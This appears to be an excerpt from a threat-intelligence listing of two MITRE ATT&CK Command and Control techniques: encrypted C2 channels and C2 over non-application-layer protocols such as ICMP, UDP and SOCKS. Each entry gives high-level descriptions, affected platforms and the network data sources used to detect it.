Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre